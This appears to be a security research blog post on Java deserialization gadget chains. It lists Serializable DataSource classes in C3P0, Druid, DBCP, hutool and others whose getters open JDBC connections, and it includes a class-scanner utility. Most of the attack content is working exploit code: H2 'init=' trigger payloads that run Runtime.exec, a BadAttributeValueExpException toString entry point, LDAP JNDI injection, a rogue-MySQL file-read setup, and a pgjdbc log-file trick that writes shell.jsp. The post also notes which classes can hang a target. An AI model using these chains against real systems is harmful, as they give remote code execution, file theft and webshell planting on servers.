Getters

Apart from TemplatesImpl, I have already covered in earlier posts which getters can do damage; the most commonly used RCE route is DataSource.getConnection() combined with H2. So the main job is hunting for DataSource classes. Below are the classes I have collected that implement both Serializable and DataSource (or a related type: ConnectionPoolDataSource, or hutool's DSFactory wrappers whose getters hand back one), which can be used to pivot a getter call into a JDBC connection.

C3P0 dependency


com.mchange.v2.c3p0.DriverManagerDataSource 
com.mchange.v1.db.sql.DriverManagerDataSource
com.mchange.v2.c3p0.test.FreezableDriverManagerDataSource
com.mchange.v2.c3p0.ComboPooledDataSource

mchange-commons-java dependency


com.mchange.v2.naming.ReferenceIndirector$ReferenceSerialized

Druid dependency


com.alibaba.druid.pool.xa.DruidXADataSource
com.alibaba.druid.pool.DruidDataSource

hibernate-core-4.x dependency

org.hibernate.service.jdbc.connections.internal.DriverManagerConnectionProviderImpl

weblogic/oracle dependency

oracle.ucp.jdbc.PoolDataSourceImpl

tomcat dependency

org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS 
org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS
org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS
org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS

hutool dependency


cn.hutool.db.ds.pooled.PooledDSFactory
cn.hutool.db.ds.simple.SimpleDSFactory
cn.hutool.db.ds.c3p0.C3p0DSFactory
cn.hutool.db.ds.dbcp.DbcpDSFactory
cn.hutool.db.ds.druid.DruidDSFactory
cn.hutool.db.ds.hikari.HikariDSFactory
cn.hutool.db.ds.jndi.JndiDSFactory
cn.hutool.db.ds.tomcat.TomcatDSFactory

Of these, ComboPooledDataSource and C3p0DSFactory retry the connection indefinitely, so they can hang the target (denial of service); use them with care.

DruidXADataSource does not work with fastjson: the getter order is wrong for it. Fastjson reaches DruidAbstractDataSource.getCompositeData() first, which throws a NullPointerException because the dataSourceStat field is not serializable (so it is null on the deserialized object), and getConnection() is never called. It is only usable in fastjson2 and jackson chains.

Likewise DruidDataSource does not work with fastjson or fastjson2; it is only usable in jackson chains.
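The class list above was collected by hand; when auditing a new classpath it is quicker to let the JVM answer the question. The following scanner is an added example (it is not code from the original post): it walks one or more jars and prints every concrete class that implements both java.io.Serializable and a javax.sql data-source interface (DataSource, ConnectionPoolDataSource and XADataSource all extend javax.sql.CommonDataSource, so one assignability check covers the whole family). It will not flag the hutool DSFactory wrappers, which are factories rather than data sources. The jar paths on the command line are assumptions; pass a library together with the jars it depends on so that superclasses can be resolved.

```java
import java.io.Serializable;
import java.lang.reflect.Modifier;
import java.net.URL;
import java.net.URLClassLoader;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Enumeration;
import java.util.Set;
import java.util.TreeSet;
import java.util.jar.JarEntry;
import java.util.jar.JarFile;
import javax.sql.CommonDataSource;

/** Lists every concrete class in the given jars that is both Serializable and a javax.sql data source. */
public class SerializableDataSourceFinder {

    /** A class is a candidate when it is instantiable, Serializable and a DataSource/ConnectionPoolDataSource/XADataSource. */
    static boolean isCandidate(Class<?> c) {
        return !Modifier.isAbstract(c.getModifiers())
                && Serializable.class.isAssignableFrom(c)
                && CommonDataSource.class.isAssignableFrom(c);
    }

    static Set<String> scan(Path... jars) throws Exception {
        URL[] urls = new URL[jars.length];
        for (int i = 0; i < jars.length; i++) urls[i] = jars[i].toUri().toURL();
        Set<String> hits = new TreeSet<>();
        // Parent-first loader: the scanned jars plus our own classpath (JDK, javax.sql).
        try (URLClassLoader loader = new URLClassLoader(urls, SerializableDataSourceFinder.class.getClassLoader())) {
            for (Path jar : jars) {
                try (JarFile jf = new JarFile(jar.toFile())) {
                    Enumeration<JarEntry> entries = jf.entries();
                    while (entries.hasMoreElements()) {
                        String name = entries.nextElement().getName();
                        // skip non-class entries and multi-release/META-INF variants
                        if (!name.endsWith(".class") || name.startsWith("META-INF/")) continue;
                        String className = name.substring(0, name.length() - ".class".length()).replace('/', '.');
                        try {
                            // initialize=false: never run static initializers of the library while scanning it
                            Class<?> c = Class.forName(className, false, loader);
                            if (isCandidate(c)) hits.add(className);
                        } catch (Throwable ignored) {
                            // NoClassDefFoundError / ClassNotFoundException when a dependency jar is missing
                        }
                    }
                }
            }
        }
        return hits;
    }

    public static void main(String[] args) throws Exception {
        Path[] jars = new Path[args.length];
        for (int i = 0; i < args.length; i++) jars[i] = Paths.get(args[i]);
        for (String hit : scan(jars)) System.out.println(hit);
    }
}
```

Usage is `java SerializableDataSourceFinder druid.jar c3p0.jar mchange-commons-java.jar` (file names assumed). Linking a class with initialize=false still resolves its superclass and interfaces, which is why the dependency jars must be on the same loader; classes that fail to link are silently skipped rather than aborting the scan, so an empty result for a jar usually means its dependencies were not supplied.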

Taking DruidXADataSource and DriverAdapterCPDS as examples:


    // DruidXADataSource: only reachable from fastjson2/jackson chains (see above).
    // Reflections.setFieldValue(obj, name, value) is a ysoserial-style reflection helper.
    DruidXADataSource ds = new DruidXADataSource();
    ds.setDriverClassName("org.h2.Driver");
    // H2 "init=" runs the statement when the connection is opened; the trigger body is JavaScript.
    String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
            "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
            "java.lang.Runtime.getRuntime().exec('calc')\n" +
            "$$\n";
    ds.setUrl(JDBC_URL);
    ds.setStatLogger(null);
    ds.setLogWriter(null);
    // null out the non-serializable fields so the object survives writeObject()
    Reflections.setFieldValue(ds, "transactionHistogram", null);
    Reflections.setFieldValue(ds, "initedLatch", null);
    ds.setInitialSize(2);

    JSONArray jsonArray = new JSONArray();
    jsonArray.add(ds);
    //jsonArray.toString();   // serializes the element, invoking its getters, including getConnection()

    // BadAttributeValueExpException.readObject() calls val.toString(), which is the entry point
    BadAttributeValueExpException val = new BadAttributeValueExpException(null);
    Reflections.setFieldValue(val, "val", jsonArray);

    // DriverAdapterCPDS (commons-dbcp / tomcat-dbcp): getPooledConnection() goes through DriverManager
    DriverAdapterCPDS dac = new DriverAdapterCPDS();
    String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
            "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
            "java.lang.Runtime.getRuntime().exec('calc')\n" +
            "$$\n";
    dac.setUrl(JDBC_URL);
    dac.setDriver("org.h2.Driver");
    // wrap it in a DataSource so that a plain getConnection() getter reaches the CPDS
    InstanceKeyDataSource dbs = new SharedPoolDataSource();
    //dbs = new PerUserPoolDataSource();
    dbs.setConnectionPoolDataSource(dac);
    //dbs.getConnection();

Beyond those, other commonly used getters that carry some degree of risk are listed below.


    // imports: java.lang.reflect.Constructor, javax.naming.CompositeName
    // com.sun.jndi.ldap.LdapAttribute: getAttributeDefinition() builds a context from baseCtxURL
    // and performs a JNDI lookup against it (JNDI injection)
    Constructor<?> ctor = Class.forName("com.sun.jndi.ldap.LdapAttribute").getDeclaredConstructor(new Class<?>[]{String.class});
    ctor.setAccessible(true);
    javax.naming.directory.Attribute obj = (javax.naming.directory.Attribute) ctor.newInstance("id");
    Reflections.setFieldValue(obj, "baseCtxURL", "ldap://127.0.0.1:1389");
    Reflections.setFieldValue(obj, "rdn", new CompositeName("exp"));
    //obj.getAttributeDefinition();

    // imports: java.security.KeyPairGenerator, java.security.KeyPair, java.security.SignedObject
    // java.security.SignedObject: getObject() deserializes the wrapped content, i.e. a second-stage gadget
    KeyPairGenerator kpg = KeyPairGenerator.getInstance("DSA");
    kpg.initialize(1024);
    KeyPair kp = kpg.generateKeyPair();
    // queue: the Serializable payload object built elsewhere
    SignedObject signedObject = new SignedObject(queue, kp.getPrivate(), java.security.Signature.getInstance("DSA"));
    //signedObject.getObject();

    // MySQL Connector/J: allowLoadLocalInfile lets a rogue server pull local files from the client
    MysqlDataSource mds = new MysqlDataSource();
    //mds = new MysqlConnectionPoolDataSource();
    mds.setUrl("jdbc:mysql://127.0.0.1:3307/test?allowLoadLocalInfile=true&allowUrlInLocalInfile=true&maxAllowedPacket=655360");
    mds.setPassword("123456");
    mds.setUser("win_ini");
    //mds.getConnection();

    // Oracle: getConnection() opens an outbound connection to an attacker-chosen host
    oracle.jdbc.datasource.impl.OracleDataSource ods = new oracle.jdbc.datasource.impl.OracleDataSource();
    ods.setURL("jdbc:oracle:thin:@//127.0.0.1:1521/orcl");
    ods.setUser("system");
    ods.setPassword("123456");
    //ods.getConnection();

    // dbcp InstanceKeyDataSource: with dataSourceName set, getConnection() resolves it through JNDI
    InstanceKeyDataSource dbs = new SharedPoolDataSource();
    //dbs = new PerUserPoolDataSource();
    dbs.setDataSourceName("ldap://127.0.0.1:1389/test");
    //dbs.getConnection();

    // pgjdbc: on driver versions that still honour loggerLevel/loggerFile, the trace log is written
    // to an attacker-chosen path (e.g. shell.jsp) as soon as the connection is attempted
    PGConnectionPoolDataSource pcpds = new PGConnectionPoolDataSource();
    pcpds.setURL("jdbc:postgresql://127.0.0.1:52791/test?loggerLevel=TRACE&loggerFile=shell.jsp");
    pcpds.setUser("root");
    pcpds.setPassword("123456");
    //pcpds.getConnection();

    PGSimpleDataSource psds = new PGSimpleDataSource();
    psds.setURL("jdbc:postgresql://127.0.0.1:52791/test?loggerLevel=TRACE&loggerFile=shell.jsp");
    psds.setUser("root");
    psds.setPassword("123456");
    //psds.getConnection();
